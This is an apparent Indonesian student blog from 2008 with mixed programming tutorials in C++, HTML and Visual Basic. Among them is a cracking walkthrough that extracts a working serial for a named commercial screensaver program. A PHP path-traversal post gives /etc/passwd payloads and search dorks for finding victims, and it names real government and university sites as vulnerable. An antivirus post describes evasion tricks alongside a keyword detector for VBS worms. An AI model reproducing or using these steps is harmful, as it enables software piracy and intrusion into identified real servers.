w177y

Dec,oct dan hex

2008-02-21T19:08:00.000-08:00

Judul diatas merupakan suatu fungsi manipulator yang digunakan untuk konversi data dalam bentuk desimal,oktal dan heksadesimal.file header yang harus disertakan adalah file header iomanip.Lihatlah dan perhatikan contoh program ini, dan simpanlah file tersebut dengan nama lat210.cpp

outputnya yang akan dihasilkan program lat210 diatas adalah
Nilai = 10
Nilai ke octal = 12
Nilai Ke hexdesimal = a
Nilai ke dedimal = 10

Lanjutan Link

2008-02-21T16:04:00.000-08:00

Kemarin belom dicontohkan bagaimana menggunakan suatu link untuk melompat pada bagian lain pada halaman yang sama. Cobalah coding dibawah ini

Ada beberapa link lagi yang saya ingin ajarkan diantaranya keluar dari suatu frame, contoh dibawah ini mendemonstrasikan bagaimana keluar dari suatu frame jike sita anda dikunci pada suatu frame

satu lagi yang ingin saya ajarkan adalh bagaimana link yang tidak bergaris bawah

dan yang terakhir yang ini saya ajarkan kan kepada anda adalah mailto, contoh ini mendemonstrasikan bagaimana untuk membuat link pada suatu pesan mail syaratnya perintah ini tidak akan bisa bekerja jika mail client tidak dipasang.

Ends

2008-02-20T16:08:00.000-08:00

B.Ends
ends merupakan suatu fungsi manipulator yang digunakan untuk menambahkan karakter null(nilai acsii nol) kederetan suatu karakter.Fungsi ini akan berguna untuk mengirimkan sejumlah karakter ke file di disk atau modem dan mengakhirinya dengan karakter null.File header yang harus disediakan adalah file header iostream.h

Buatlah contoh dibawah ini

kalau tidak ada salah penulisan maka output yang akan dihasilkan oleh program yang kita buat diatas adalah:

Kesimpulan
- Ends digunakan untuk menambahkan suatu karakter kosong
- Jika ingin menggunakan ends harus memasang header iostrem.h

Link HTML

2008-02-19T16:50:00.000-08:00

Kelebihan utama dari bahasa web yang sedang kita pelajari adalah kemampuan untuk memberikan link dari satu teks atau gambar menuju ke dokumen atau bagian lain dari suatu dokumen.Browser web akan menyorot teks atau gambar yang diidentifikasi sebagai link dengan warna atau dengan garis bawah untuk menunjukkan bahwa itu adalah hyperteks link.Dokumen bahasa web yang sedang kita pelajari menggunkan hyperlink untuk menggabungkan jepada dokumen lain dalam web

Tag yang digunakan untuk link dapat dibagi menjadi 3 yaitu :
a. Link Relatif
Link Relatif adalah suatu link yang dibuat apabila anda membuat suatu link pada page anda ke page lain pada komputer yang sama, tidak memerlukan atau menggunakan alamat internet yang lengkap
b. Link Absolut
Link yang dibuat apabila anda membuat link kepage web lain yang berada pada web site lain diinternet.
C. Link Dalam Dokumen yang sama
Link jenis ini dibuat apabila anda membuat dokumen yang panjang sekali sehingga apabila ditampilkan dalam suatu browser web akan mengharuskan kita melakukan scroll layar yang berulang-ulang
Contoh Link
a. Membuka Link
Buatlah dua file ini

Kalau sama dengan yang saya coba maka dokumen 13 link ke dokumen 12
B. Membuka Link dengan Window baru
Buatlah file ini

Kalau sama dengan yang saya coba maka dokumen 14 link ke situs ini
C. Link pada lokasi dihalaman yang sama

Membuat Aplikasi Nilai

2008-02-18T18:01:00.001-08:00

Hari ini kita akan mencoba membuat sebuah aplikasi sederhana yaitu menghitung nilai dan memasukkannya ke dalam database.Temen-temen cobalah membuat database di access dengan table teman yang isinya nama,alamat,telepon dan buatlah program seperti dibawah ini.Jangan Lupa tambahkan component pada tool box micosoft ado data control 6

kalau sudah klik kanan pada adodc1 lalu pilih adodc propertis

setelah hasilnya seperti gambar diatas pilih tombol build lalu pilih microsoft jet 4.0 lalu next , lalu cari databasenya lalu lakukan test conection jika berhasil tekan ok
setelah selesai klik dua kali tombol simpan lalu masukan coding adodc1.recordset.update
jangan lupa text1 ampe text 3 nya di set kaya kemarin
selamat mencoba

Link HTML

2008-02-14T16:22:00.000-08:00

Kelebihan utama dari dokumen berbasis web yang sedang kita pelajari adalah kemampuannya untuk memberikan link dari suatu text atau gambar menuju ke dokumen lain atau kebagian lain dalam suatu dokumen. Browser web akan menyorot (Highlight) teks atau gambar yang diidentifikasi sebagai link dengan warna atau dengan garis bawah atau mungkin menggunkan kedua-duanya untuk menunjukkan bahwa itu adalah hyperteks link.Dokumen yang berbasis web yang sedang kita pelajari menggunakan hyperlink untuk menghubungkan kepada dokumen lain dalam web.

Contoh dibawah ini akan mendemonstrasikan bagaimana untuk menambahkan link ke dalam suatu dokumen berbasis web yang sedang kita pelajari.

maka hasilnya adalah 0 link 1 dan 0 link ke 2

Serial Phising Screensaver Designer V1.0

2008-02-14T16:03:00.000-08:00

Serial Phising Screensaver Designer V1.0
Oleh X-Bite
Mungkin sebagian dari kita sudah tahu, apa itu serial phising... namun bagi yang belum mengetahuinya.. serial phising adalah teknik mencari serial valid didalam badan program asli.Hmm.. penjelasannya begini.. saat kita memasukan serial number, biasanya program akan membandingkan serial yang kita masukan dengan serial valid program, dimana serial valid program biasanya didapat dari input user yang kita berikan.. namun pada beberapa kasus ada serial yang "hardcoded" alias serial satu untuk semua.. jadi kita akan mencari saat dimana serial yang kita inputkan dibandingkan dengan serial asli dari program untuk mengetahui serial yang valid.. OK, cukup pembukaannya..

Tentang Target :
Create Professional Screen Savers in Minutes -
Screensaver Designer is a powerful tool to create, compile and distribute screen savers for Windows. It has a fully integrated workspace that permits you to work efficiently and create professional screen savers in minutes.
Program ini juga dapat membuat screensaver dengan format BMP (Bitmap), JPG (JPEG), SWF (Shockwave Flash), MP3 (MPEG Layer 3), MIDI/RMI (MIDI Music), WAV (Windows WAVE), WMA (Windows Media Audio), ASF (Netshow movie), AVI (Windows video), MPG (MPEG I video), WMV(Windows Media Player Video).

Proteksi:
1. Serial Number
2. Muncul evaluation pada screensaver yang kita buat

Tools:
1. PEID 0.94 ; download di www.peid.has.id kalau anda blm punya
2. Ollydbg v.1.10

Evaluasi Program:
Pertama-tama saya telah mengevaluasi software ini, dimana program ini dipack dengan menggunakan "ASPack 2.12 -> Alexey Solodovnikov" dan PEiD tidak menemukan enkripsi yang sesuai dengan databasenya. Program ini tidak memiliki batas waktu trial, namun saat kita membuat screensaver dengan trial program, akan muncul kotak pemberitahuan pada screensaver bahwa screensaver itu dibuat dengan menggunakan screensaver designer trial version....
Program ini tidak saya unpack, karena meskipun dipack, packer akan meng-unpack program didalam memori agar dapat berjalan... jadi kita akan mencari serial yang valid didalam memori....
Serial Phising:
Buka program screensaver designer pada olly kita kemudian run.. Klik tanda tanya pada program (lambang help) dan klik register isi dengan user X-Bite dan Serial 1111111111111111111111 setelah menekan register, akan muncul peringatan untuk merestart program.... namun jangan pencet OK dulu...

Kali ini saya akan mengenalkan teknik mencari rutin serial dengan menggunakan callstack, teknik ini digunakan lena151(thanks for your nice tuts) pada beberapa tutorial yang dibuatnya.. sebelum memencet OK, kembali ke olly kita, pencet pause (F12) kemudian View>>Call Stack (Alt+K)... anda akan melihat tumpukan call yang dibuat oleh program screensaver designer

Dapat kita lihat disana kalau messagebox diatas dipanggil dari alamat 00570642, klik 2x pada alamat itu....
00570605 E8 4A8AE9FF CALL 00409054
0057060A 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
0057060D B8 A0065700 MOV EAX,005706A0 ; ASCII "UserName" ; !!!!
00570612 E8 DD6FFFFF CALL 005675F4
00570617 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8]
0057061A B8 B4065700 MOV EAX,005706B4 ; ASCII "SerialNo" ;!!!!
0057061F E8 D06FFFFF CALL 005675F4
00570624 C783 4C020000 0100000>MOV DWORD PTR DS:[EBX+24C],1
0057062E 6A 40 PUSH 40
00570630 68 C0065700 PUSH 005706C0 ; ASCII "Information"
00570635 68 CC065700 PUSH 005706CC ; ASCII "Please restart Screensaver Designer! "
0057063A 8BC3 MOV EAX,EBX
0057063C E8 7793F1FF CALL 004899B8
00570641 50 PUSH EAX
00570642 E8 1172E9FF CALL 00407858 ; JMP to user32.MessageBoxA ; Kita disini
00570647 A1 FC135800 MOV EAX,DWORD PTR DS:[5813FC]
0057064C 8B00 MOV EAX,DWORD PTR DS:[EAX]
0057064E E8 35BCF0FF CALL 0047C288

Pada tahap ini saya juga telah mengecek kalau software ini menulis data registrasi kita kedalam file option.ini di folder instalasinya,setelah melihat apa yang perlu kita cari, klik kanan>>search for>>all referenced text string... scroll keatas, klik kanan search for text "SerialNo" tanpa tanda kutip .. kita akan menemukan seperti ini pada search next yang kedua, karena yang pertama ditemukan adalah kode diatas, hehe....
00574FE5 B8 E8515700 MOV EAX,005751E8 ; ASCII "UserName"
00574FF2 B8 FC515700 MOV EAX,005751FC ; ASCII "SerialNo"
00574FFF BA 10525700 MOV EDX,00575210 ; ASCII "JHGUy5765jHGJHG***" ; <= hmmm..

Pasang hardware breakpoint di alamat 00574FE5 dengan cara klik kanan>>breakpoint>>hardware on execution...karena jika kita menggunakan software breakpoint(F2) olly akan crash saat di restart(ctrl+F2) (info: pada program yang dipack, kita tidak dapat menggunakan software breakpoint).. restart olly (ctrl+F2) kemudian program akan break dialamat 00574FE5... dari sini kita akan men trace program ini
00574FE5 B8 E8515700 MOV EAX,005751E8 ; ASCII "UserName"
00574FEA E8 4525FFFF CALL 00567534 ;membaca username
00574FEF 8D55 F8 LEA EDX,DWORD PTR SS:[EBP-8]
00574FF2 B8 FC515700 MOV EAX,005751FC ; ASCII "SerialNo"
00574FF7 E8 3825FFFF CALL 00567534 ;membaca serial number
00574FFC 8D4D F4 LEA ECX,DWORD PTR SS:[EBP-C]
00574FFF BA 10525700 MOV EDX,00575210 ; ASCII "JHGUy5765jHGJHG***" ;konstanta untuk men-generate serial
00575004 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] ;username
00575007 E8 B834FFFF CALL 005684C4
0057500C 8D55 E0 LEA EDX,DWORD PTR SS:[EBP-20]
0057500F 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] ;proses generate serial
005750A6 BA 05000000 MOV EDX,5 ; saya kembali memotong sedikit demi memperpendek tutor
005750AB E8 D4FAE8FF CALL 00404B84
005750B0 8D55 CC LEA EDX,DWORD PTR SS:[EBP-34]
005750B3 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] ;serial yang valid dalam huruf kecil
005750B6 E8 493DE9FF CALL 00408E04 ;membuat jadi huruf besar serial yang valid
005750BB 8B45 CC MOV EAX,DWORD PTR SS:[EBP-34] ;serial yang kita cari
005750BE 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8] ; serial yang kita masukan
005750C1 E8 4AFBE8FF CALL 00404C10 ; call yang membandingkan kedua serial
005750C6 75 1A JNZ SHORT 005750E2 ;lompat jika tidak valid, bye2 cracker jelek
005750C8 33D2 XOR EDX,EDX
005750CA 8B83 8C030000 MOV EAX,DWORD PTR DS:[EBX+38C]
005750D0 E8 53D3F1FF CALL 00492428
005750D5 33D2 XOR EDX,EDX
005750D7 8B83 54060000 MOV EAX,DWORD PTR DS:[EBX+654]
005750DD E8 9ADEF0FF CALL 00482F7C
005750E2 33D2 XOR EDX,EDX
Semua yang saya beri komen dapat dilihat isinya pada 'taskpane' pada olly diatas dump window, disitu dapat dilihat kalau program mengenerate 3 angka dalam hexa yang panjang dan mengambil 4 karakter dari 3 angka acak tersebut dan kemudian digabung sehingga menjadi satu pada alamat 005750B3 dan dirubah menjadi huruf besar dan dapat dilihat pada alamat 005750BB....5E90-1394-05E7 (serial untuk user name X-Bite).
Tutup olly kita, dan jalankan program screensaver designer kemudian register kembali dengan menggunakan salah satu serial yang kita dapatkan... program akan kembali meminta restart program, klik saja OK.. kemudian buka kembali program screensaver designer.. kita akan melihat kalau program telah menjadi Registered Version.....LOL

Fungsi Manipulator

2008-02-13T18:45:00.000-08:00

Manipulator pada umumnya digunakan untuk mengatur tampilan layar.Ada beberapa fungsi manipulator diantaranya endln,ends,dec,oct dan hex , setprecicion,setbase,setw,setfill,setiosflsgs untuk memudahkan proses belajar kita, maka akan diberikan teori dahulu, mari kita mulai dari endl adalah suatu fungsi yang digunakan untuk menyisipkan karakter atau mengatur pindah baris.Buatlah contoh dibawah ini

kalau tidak ada salah ketik codingnya maka hasilnya akan seperti dibawah ini
Masukan Nilai A :7.5
Masukan Nilai B :8.4
Masukan Nilai c :15.9
Karena bahan ini berat maka kita akan bahas satu demi,satu jadi dapat dikatakan bahwa endl adalah suatu perintah yang berfungsi untuk memindahkan baris

Entitas Karakter HTML

2008-02-11T18:50:00.000-08:00

Beberapa Karakter mempunyai arti khusus, seperti tanda lebih kecil dan tanda lebih besar, jika kita menginginkan browser untuk menampilkan karakter-karakter tesebut kita harus menyisipkan entitas karakter.Daripada kalian pada bingung cobalah ketik coding seperti dibawah ini

Bagaimana makin jelas tidak, cobalah contoh dibawah ini lagi semoga saja anda semakin jauh mengerti

well itulah untuk hari ini

Random Number Generator

2008-01-31T16:45:00.000-08:00

Oleh Dendi Suhubdy A.K.A Cron of NuLL

Random number generator atau pembangkit bilangan acak, kerap kali diimplementasikan di dalam berbagai algoritma kriptografi. Contohnya saja pada algoritma kriptografi Deffie-Helman yang memerlukan bilangan prima sebagai input. Nah, cara yang paling efektif untuk mendapatkan suatu bilangan prima acak adalah dengan cara melakukan pembangkitan bilangan acak kemudian mengetes apakah bilangan yang dibangkitkan itu berupa bilangan acak atau tidak.

Sekarang pertanyaannya adalah……apa algoritma untuk melakukan pembangkitan bilangan acak tersebut? Yupzzz, Anda dapat menggunakan rand atau Math.Random pada C plus-plus atau System.Random pada C sharp atau java.util.Random pada Java. Namun, jika Anda memeriksa algoritma yang digunakan oleh fungsi-fungsi tersebut, Anda akan menemukan bahwa itu adalah RNG yang lambat…..masih ada cara untuk mempercepatnya beberapa CPU clock cylces…lagipula baru-baru ini ditemukan security flaw pada fungsi rand sehingga bilangan acak ini dapat dibangkitkan kembali dan ini merupakan ancaman yang serius untuk dunia kriptografi.
Kalau Anda adalah orang yang haus akan ilmu hacking dan matematika diskrit…….inilah jawabannya……..

Algortima pertama adalah R250/5231 yang diciptakan oleh Kirkpatrick dan Stoll yang dipublikasikan di A Very Fast Shift-Register Sequence Random Number Generator, J. Computational Physics, vol 40, pp. 517-526.
Algoritma yang kedua adalah Mersenne Twister yang diciptakan pada tahun 1996 oleh Matsumora dan Nishimura.

Source codenya dapat di compile dengan gcc v3.3…….atau kalau Anda benar-benar kreatif, ubahlah source code ini sesuai dengan keinginan Anda……tetapi jangan lupa pada kontribusi orang-orang yang menciptakan algoritma ini. Upzzzzzzzz, gw lupa kalau source code java dan C sharpenya juga ada. Berikut linknya dari semua source codenya.

www.4shared.com/file/32947855/4bc0a7c/RNG_520_dan_MT.html

Lanjutan C++

2008-01-30T16:16:00.009-08:00

Oleh Vbbego

Dalam C anda sudah dikenalkan mengenai tipe data yang ditulis tahun lalu oleh teman saya, hari ini kita akan mempelajari perintah keluaran.Apa yang dimaksud dengan perintah keluaran ? Intinya adalah suatu perintah yang digunakan untuk mengeluarkan hasil yang ditampung oleh konstanta.Lalu apa yang dimaksud dengan konstanta ? Konstanta adalah suatu nilai yang sifatnya tetap, secara garis besar konstanta dapat dibagi menjadi dua bagian yaitu :
1. Konstanta Bilangan
2. Konstanta teks
Sedangkan untuk perintah keluaran yang disediakan c adalah printf,puts,putchar dan count.Daripada makin bingung dan malah entar tidak mengerti cobalah penggalan program dibawah ini.

coding diatas adalah masukan angka 7 ke a, masukan char G ke B, selanjutnya cetak char dan desimal dan keluarkan isi dari b dan isi dari a sehingga hasil akhirnya menjadi seperti ini:
G merupakan abjad yang ke 7
Sekarang bagaimana jika kita ingin menggunkan penentu lebar field ? Bila kita ingin mencetak atau menampilkan data yang bertipe float, tampilan yang nampak biasanya kurang bagus , oleh karena itu c memberikan anda untuk dapat mengatur lebar field dan jumlah desimal yang akan Anda cetak.
Bingung yah coba perhatikan program dibawah ini
ini adalah program yang tidak menggunakan penentu lebar field

bandingkan dengan program dibawah ini yang mengunakan penentu lebar field

program pertama tidak membatasi berapa angka belakang koma, program kedua membatasi sampai satu angka belakang koma, penambahan \n artinya menambahkan newline(Baris Baru).Sekarang kita membahas puts yang sebenarnya sama dengan print biar mudahnya perhatikanlah program dibawah ini

Put adalah perintah yang menampilkan karakter tanpa diakhiri baris

akhirnya sampai juga ke count kayanya sudah jelas deh buat menghitung lalu bagaimana menulisnya di c, perhatikan program dibawah ini:

o ya endl berguna seperti \n

Lanjutan

2008-01-29T18:48:00.040-08:00

oleh ani
Address(Alamat)merupakan salah satu elemen yang umum di dalam suatu dokumen, dalam html disediakan secara khusus yang biasa disebut Tag Address, dengan adanya tag ini maka penulisan alamat dapat distandarkan.contoh ini mendemonstasikan bagaimana menulis alamat dalam suatu dokumen

maka hasilnya akan seperti ini

Cukup dulu hari ini mau ujian dulu yah

Bug Excel 2007

2008-01-28T17:02:00.043-08:00

Bug Excel 2007
Oleh Vbbego
Disadur dari Hack Rapidshare & Attack Friendster

Banyak orang akan berpikir bahwa suatu produk yang baru pasti lebih baik daripada sebelumnya.Hal itu tentunya tidak berlaku bagi Excel 2007.Banyak situs yang sudah memuat kelemahan excel 2007 ini.Pada kesempatan kali ini saya hanya menyoroti salah satu fungsi perkalian saja.Bagi anda yang mengunakan office 2007, anda dapat mencobanya. Coba anda buka excel 2007, kemudian kalikan 850 x 77,1 = 100000, jika kita hitung dalam kalkulator semestinya 65.535.Untuk menguji kebenarannya silakan anda menggunakan kalkulator yang ada dikomputer maupun kalkulator biasa.Bug lain yang saya ingin sampaikan pada kesempatan ini perkalian 11 x 11 yang bertambah satu, untuk lebih mudahnya lihat contoh dibawah ini:
1. 11 x 11 = 121
2. 111 x 111 = 12321
3. 1111 x 1111 = 1234321
4. 11111 x 11111 = 123454321
5. 111111 x 111111 = 12345654321
6. 1111111 x 1111111 = 1234567654321
7. 11111111 x 11111111 = 123456787654321
8. 111111111 x 111111111 = 12345678987654300
9. 1111111111 x 1111111111 = 1234567900987650000

Kalau kita lihat conyoh diatas bug lainnya yang terdapat pada excel 2007 adalah pada bagian nomor 8, dimana perkalian 111111111 x 111111111 jawaban yang benar seharusnya adalah 12345678987654321 tetapi excel salah dalam menjawabnya dan masalah seperti ini berulang lagi pada perkalian berikutnya.

Apa dan Bagaimana : Teknik Heuristik Pada Antivirus

2008-01-23T16:23:00.008-08:00

Apa dan Bagaimana : Teknik Heuristik Pada Antivirus
Oleh Fajar
Teknik heuristik merupakan teknik yang dipakai antivirus untuk mendeteksi keberadaan virus2 baru atau yang belum terdapat di signature antivirus tersebut. Bagaimana caranya? Tentunya setiap antivirus memiliki cara sendiri2. Kita ambil contoh antivirus (yang lokal2 aja ya..) Ansav +E Advanced 1.7.8 (ga tau klo ada versi barunya) , av ini mengusung "Advanced Ansav Heuristic Engine". Pada AAHE ini, Ansav akan mendeteksi suatu file sebagai ancaman dengan dengan membandingkan suatu signature dengan entrypoint/PE Header pada body file. Yah kurang lebih begitu. Sedangkan pada PCMAV rc23, heuristik andalannya yaitu dengan mengecek jika suatu file mempunyai signature suatu icon tertentu. Maksudnya jika kita membuat program yang mengandung icon folder (baik sebagai icon file atau resource) maka PCMAV akan menganggap file tersebut sebagai ancaman.

Namun teknik-teknik heuristik tersebut dapat dilewati/ heuristic bypassing dengan mudah, misalnya pada Ansav, kita dapat memakai program packer2 yang tidak terdapat di "database" heuristiknya Ansav. Sedangkan pada PCMAV, ya.. paling gampang tinggal ga pake icon2 yang dianggap ancaman (icon folder, word dsb) atau mengubah struktur body icon memakai program hex editor (namun hati2 biar icon ga berubah gambar)

Pada kesempatan ini saya akan membahas teknik heuristik untuk mendeteksi worm VBS. Ini karena penasaran sama PCMAV yang selau aja jitu menebak VBS worm. Ceritanya ketika teman saya minta bersihiin virus, truz ternyata terdeteksi sebagai worm oleh antivirus luar di pc saya, iseng pengen nyoba kehebatan antivirus saya tersebut, saya mencoba mengenkripsi worm tersebut, dimana tulisan "Scripting.FileSystemObject" saya enkripsi menjadi Chr(83) + Chr(99) + Chr(114) + Chr(105) + Chr(112) + Chr(116) + Chr(105) + Chr(110) + Chr(103) + Chr(46) + Chr(70) + Chr(105) + Chr(108) + Chr(101) + Chr(83) + Chr(121) + Chr(115) + Chr(116) + Chr(101) + Chr(109) + Chr(79) + Chr(98) + Chr(106) + Chr(101) + Chr(99) + Chr(116)

Tadaaa... ternyata antivirus saya tidak mampu mendeteksinya... Kemudian teringat PCMAV (soalnya pernah baca diweb resminya klo PCMAV punya heuristik canggih buat mendeteksi file VBS). Pas discan pake PCMAV ternyata terdeteksi. Ya udah saya enkripsi semua string. Ehhh ternyata masih terdeteksi... hebat2... ini antivirus punya paranoid heuristik Setelah saya teliti2 hampir seribu detik, ternyata heuristiknya PCMAV yaitu dengan mendeteksi beberapa tulisan yang tidak mungkin tidak dipakai oleh suatu worm, yaitu salah satunya kombinasi command "CreateObject" dan "wscript.scriptfullname". Tulisan ini gimana ya enkripsinya?? soalnya tipe tulisan ini bukanlah string, melainkan command internal pada VBS. Klo di Delphi command2 mungkin bisa dienkripsi,itu mungkin juga cuma command2 yang memakai API misalnya "UrlDownloadToFile" dimana memanggil dari file urlmon.dll. Yah main2in memory (GetProcAddress).

Tapi, saya ga akan membahas bagaimana caranya heuristic bypassing, malez bo klo banyak virus canggih, ntar klo ada cewek minta tolong saya bersiin pcnya dan saya ga bisa kan.. giiitu dech... Ok.. lanjut, kita kita akan bikin program dasar untuk mendeteksi worm VBS.

Yang kita perlukan adalah VB6 dan :
Komponen dan nama

TextBox : Text1

CommandButton : Command1
CommandButton : Command2
CommonDialog : CommonDialog1

Pada Command1 isikan :

CommonDialog1.Filter = "VBS File (*.vbs)|*.VBS"
CommonDialog1.ShowOpen
If CommonDialog1.FileName = "" Then Exit Sub
Text1.Text = CommonDialog1.FileName

Pada Command 2 isikan :

Vbs_Checker Text1.Text

Kemudian buat fungsi sebagai berikut :

Public Function Vbs_Checker(ByVal target As String)

If target = "" Then Exit Function
If Dir$(target) = "" Then Exit Function

On Error Resume Next

Open target For Input As #1
While EOF(1) = False
DoEvents

Line Input #1, maltext
maltext = " " & maltext
maltext = LCase(maltext)

If InStr(maltext, "createobject") > 0 Then GoSub warning
If InStr(maltext, "regwrite") > 0 Then GoSub warning
If InStr(maltext, "wscript.scriptfullname") > 0 Then GoSub warning
If InStr(maltext, "ActiveDocument.Shapes.AddOLEObject") > 0 Then GoSub warning

Wend

Exit Function

warning:
MsgBox "Suspected command : " & maltext, vbExclamation, "Warning"
Return
End Function

Seharusnya kode2 di atas self explained, tapi saya jelasin lagi deh buat pemula kaya saya. Inti dari program tersebut yaitu membaca file VBS yang kita pilih dan membandingkan isi file VBS dengan tulisan tertentu, misalnya "createobject". Jika ketemu tulisan tersebut maka keluar peringatan.

Sekali-lagi, kode2 di atas hanyalah konsep untuk mendeteksi worm VBS. Mungkin lebih baik dengan membandingkan lebih dari satu kata untuk mencegah indikasi false alarm.

Demikianlah (kaya nutup pidato aja), mudah2an ada manfaatnya buat yang baca.
Trims.

Fajar :: anggiawan.web.id
Love to :
- teman2 ku di eks unpad dan marnat
- para av maker lokal

Hate to :
- pengimpor kondom impor bekas
- penjual kondom impor bekas
- pemakai kondom impor bekas
- pkoknya yang nyalahgunain kondom bekas.

Computer Out Put

2008-01-22T16:33:00.000-08:00

Oleh Ani

Seperti judul diatas kita kan membahas computer output contoh ini mendemostrasikan bagaimana tag "computer output" akan ditampilkan

Setelah anda mengerti compuet output saya akan membahas Alamat.Alamat merupakan salah satu elemen yang umum didalam suatu dokumen.Dengan adanya tag ini maka penulisan alamat dapat distandarkan.Contoh ini mendemonstasikan bagaimana menulis sebuah alamat dalam sebuah dokumen HTML

hari ini kita sampai disini dahulu, semoga berguna,Bagi yang sedang mengalami nasib yang sama dengan saya ( Lagi UAS ), moga-moga anda dapat mendapat nilai yang terbaik dan ketahuilah bahwa contek itu korupsi yang paling mudah untuk dilakukan tapi susah untuk tidak dilakukan jadi jangan lakukan yah

PHP download script vulnerability

2008-01-21T16:32:00.045-08:00

PHP download script vulnerability
Oleh tomplixsee

Sebenarnya saya bingung mau memberi judul apa pada artikel ini. Maaf bila judulnya agak kurang pas dengan isi artikelnya
PHP adalah suatu bahasa pemrograman web yang cukup sakti yang kehandalannya tidak diragukan lagi. Tapi,adanya kesalahan dalam logika pemrograman php akan bisa berakibat fatal.
Salah satu contohnya adalah :
//download.php
header( "Content-Type: application/octet-stream" );
header( "Content-Length: " . filesize($_GET['file'] ) );
header( "Content-Disposition: inline; filename=\"$_GET[file]\"");
readfile($_GET['file'] );
?>
Kode php diatas memiliki kelemahan yang fatal, dimana variabel “file” sama sekali tidak difilter, sehingga hacker akan bisa mendownload file apapun yang ada di server tersebut. Misalkan saja sang hacker mengakses alamat http://korban/download.php?file=../../../../../../etc/passwd maka file /etc/passwd milik server akan dikirimkan ke hacker.
Atau jika hacker mengakses alamat http://korban/download.php?file=download.php maka hacker akan mendapatkan source code dari file download.php.
Sedangkan untuk mencari korban bisa kita gunakan google, misalkan dengan syntax inurl:”download.php?file=” , atau inurl:”download.php?file=*.pdf” -intext:”download.php?file=*.pdf” atau yang lainnya.
Beberapa contoh situs yang vulnerable adalah:
http://www.mpbp.gov.my/download.php?file=download.php
http://elearning.mmu.edu.my/download.php?file=download.php
http://www.utem.edu.my/fkp/latihanIndustri/download.php?file=../../../../../../etc/passwd
http://www.moe.gov.my/pipp/download.php?filename=/../../../../../../etc/passwd
Adapun sedikit hal untuk pencegahan adalah:
1. lakukan pemfilteran terhadap inputan yang diterima dari user.
Misalkan pemfilteran terhadap karakter “../”, “”, atau type file yang boleh didownload.
2. lakukan pembatasan file access
3. berikan batasan, file di folder mana saja yang boleh didownload atau tidak
4. untuk menghindari googling, hindari penamaan script dengan nama “download.php” dan nama variabel dengan nama “file”.
terimakasih

By tomplixsee
Thanks to:

Ira, teman2 kosku

New Vb

2008-01-20T18:47:00.004-08:00

Hari ini kita akan membahas koneksi visual basic ke databases, kita mulai dari yang gampang terlebih dahulu dengan menggunakan data. cobalah temen-temen buat sebuah database dengan nama coba dengan menggunkan acces. Buatlah table seperti dibawah ini
field name Data type field size
Kode text 6
Nama text 50
Lalu simpanlah dengan nama coba1, setelah itu tutup accesnya lalu buka vb dan buat seperti dibawah ini:

hari ini kita tidak belajar coding, tetapi minggu depa sudah pasti kita belajar coding , cobalah kalian ikuti langka dibawah ini:
1.Pada Propertis data kalian klik cari connect pilih acces lalu pada database name masukan databases yang tadi kalian buat
2.Kemudian carilah recordsource lalu diganti dengan nama table yang kalian buat
3.setinglah dua textbox diform dengan merubah setingan yang sama dengan diatas maka anda sudah dapat membuat data yang di text box masuk kedalam database

Pengalaman Pribadi

2008-01-16T15:54:00.000-08:00

Oleh Jack
Senin lalu, jack datang kesebuah kampus yang berada dijalan salemba dengan maksud ingin melihat dan mendafarkan adiknya yang ingin kuliah. Sampai di sebuah sekolah tinggi *********, Ia minta izin untuk melihat fasilitas yang ada, yang menjadi sasaran yah lab komputernya.Ternyata kampus itu memiliki 3 lab, Jack merasa ada sesuatu yang aneh dengan kampus ini, karena disalah satu labnya masih mengunakan Windows NT dengan spek komputer yang rata-rata pentium 2, beralih ke lab yang kedua disini sudah mengunkan LCD dengan spek komputer setara pentium 3 (Sebenarnya Menggunakan Prosesor AMD ). Setelah mencoba beberapa aplikasi. Jack merasa komputer ini super lambat oleh karena itu jack mengunkan sebuah software yang dapat mempercepat kinerja prosesor komputer tersebut. Nama program yah adalah SW-Speedgear versi 5.0.0.Dengan sofware ini komputer yang lambat menjadi lebih cepat membuat Jack dengan leluasa menjelajai komputer yang sedang dipakai. Cara pemakaian software ini sangat mudah tinggal install lalu tinggal pilih ingin berapa cepat prosesor kita bekerja lalu tekan apply lalu minimize saja. Setelah puas Jack mematikan SW-Speedgear yah dengan mengklik tombol silang.Satu lagi kelemahan kampus itu adalah banyaknya virus dalam lab komputer yah sangat disayangkan yah.Kampus seharusnya menjadi tempat belajar yang aman dan nyaman, bukan sebaliknya menjadi tempat yang tidak nyaman dan tidak aman, anehnya waktu matakuliah selesai masih banyak saja mahasiswa yang mengambil file yang mereka kerjakan dengan flash disk yah.Jack lebih terpukul ketika dia mengetahui bahwa semua komputer disini dipelihara dengan cara format ulang kalau bermasalah tinggal format ulang.Jack sempat berbicara dengan mahasiswa yang akan praktikum tentang seseorang yang memakai inisial vbbego.Tidak ada yang tahu alhasil terakhir dilab yang konek dengan internet dia membuka blog ini dan langsung meninggalkan yah.

Format Text Html

2008-01-15T23:01:00.022-08:00

Oleh Ani

Hari ini kita akan membahas pemformatan teks yang dapat dibagi menjadi beberapa diantaranya menebalkan huruf,memiringkan huruf, memberikan tekanan pada teks, mengecilkan text,superscript, subscript sebagai contoh buatlah contoh dibawah ini

kalau sudah simpanlah file itu dengan nama coba_teksformat jangan lupa abis itu klik dua kali file yang disave. Ini merupakan text format yang dasar bagaimana jika ingin agar jarak antara kata suatu text atau kalimat didalam dokumen web adalah sebesar satu spasi.Daripada bingung mending dicoba coding dibawah ini biar menjadi ngerti.

coba lihat hasil bagaimana ngerti engga kalau engga ngerti coba baca ulang lagi tulisan saya ini

Teleport

2008-01-14T16:40:00.000-08:00

Dibuat oleh vbbego

